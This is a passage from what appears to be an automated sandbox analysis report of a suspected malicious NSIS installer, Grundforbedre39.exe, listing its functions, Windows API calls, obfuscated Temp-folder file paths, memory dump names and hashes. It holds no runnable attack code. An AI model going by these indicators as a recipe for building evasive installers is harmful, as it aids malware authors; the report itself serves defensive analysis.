                                                                                      • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                                                      • Opcode Fuzzy Hash: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                                                      • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                      • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 3808545654-0
                                                                                      • Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                                      • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                                                      • Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                                      • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405AD6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • lstrlenW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                                                                      • GetFileAttributesW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3248276644-1197487810
                                                                                      • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                                      • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                                                                      • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                                                      • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405A79 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                      • CharNextW.USER32(00000000), ref: 00405A8C
                                                                                      • CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 00405A7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 3213498283-4087429501
                                                                                      • Opcode ID: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                                                                      • Instruction ID: 2b58bc667f998461ca91ac7b18547026c13bd309f09f4c7a6bbb9f4139172dd1
                                                                                      • Opcode Fuzzy Hash: 9abac7bd8d8eb78344d3a0fd8b33b6e2d04e06e22655e8e5944c69e008adfdc9
                                                                                      • Instruction Fuzzy Hash: 09F09611B10B1295DB3276544CC5A7766BCEF94361F14823BE501B72C0E3FC48818FEA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004059CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3355392842
                                                                                      • Opcode ID: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                                                      • Instruction ID: 0310c51cfe5e9f7ce5f17852bd92726e60929743d8abc3d3bdfc5d6511664db2
                                                                                      • Opcode Fuzzy Hash: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                                                      • Instruction Fuzzy Hash: C0D0A731111530ABC211AB488D04DDF739C9E463453424037F101B31A1D7785D5197FE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402D9D
                                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402DE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                                      • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                                                                      • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                                                      • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403B39 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: TextWindow
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$1033
                                                                                      • API String ID: 530164218-988959552
                                                                                      • Opcode ID: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                                                      • Instruction ID: a3bd2acee85f271d60691375da4bc4fc24ae93d70a97cc42eb68c8ddca864a14
                                                                                      • Opcode Fuzzy Hash: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                                                      • Instruction Fuzzy Hash: C311F631B40611EBC7349F15DC809777BBCEB45719718857FE801A73A2CA39AD038A68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004050ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040511C
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                                                        • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                                      • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                                                                      • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                                                                      • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004037CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,75B23420,00000000,C:\Users\user\AppData\Local\Temp\,004037A6,004035BC,?), ref: 004037E8
                                                                                      • GlobalFree.KERNEL32(?), ref: 004037EF
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-3355392842
                                                                                      • Opcode ID: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                                      • Instruction ID: fd5cce2495c6c1b199366fa48a4731a267e7b28c4e3a2e6049d666ad51adf226
                                                                                      • Opcode Fuzzy Hash: cc9cc45aeb8a1a052ae149341dfb74268264b46ba2e5a2dd49a2ce89511675a7
                                                                                      • Instruction Fuzzy Hash: F3E0C2B39040305BC7216F14EC4471AB7A86F88B32F058126F8817B3A087742C924FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405A1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Grundforbedre39.exe,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405A20
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Grundforbedre39.exe,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405A30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
